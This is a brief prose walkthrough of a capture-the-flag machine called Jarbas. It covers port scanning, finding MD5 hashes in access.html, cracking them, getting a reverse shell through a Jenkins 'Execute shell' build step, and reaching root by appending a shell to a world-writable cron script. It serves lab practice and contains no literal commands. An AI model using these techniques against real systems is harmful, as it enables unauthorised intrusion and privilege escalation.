Thanks for appreciating this machine.

@tiagotvrs 
[root@jarbas ~]#

Summary

nmap found ports 22, 80, 3306 and 8080. Port 80 serves a static news-style site with no working interaction; port 8080 is a Jenkins login page, and its robots.txt (found by nmap's vuln scripts) warns that robots should not click "build" links. gobuster and dirb on port 80 found no directories, but a second gobuster run with -x html,php found access.html, which lists three users with MD5 password hashes. john against rockyou plus an online lookup recovered all three passwords; only eder's worked on the Jenkins login. In Jenkins: New Item, Freestyle project, add an "Execute shell" build step containing a reverse shell, Build Now, and a shell as the jenkins service user arrives. That user has no sudo rights, so the next stop was cron: /etc/cron.d/0hourly just runs /etc/cron.hourly, whose only script, 0anacron, is not writable. /etc/crontab, however, runs /etc/script/CleaningScript.sh as root every five minutes, and that script is world-writable. Appending a reverse shell to it and listening on Kali yields a root shell within five minutes.
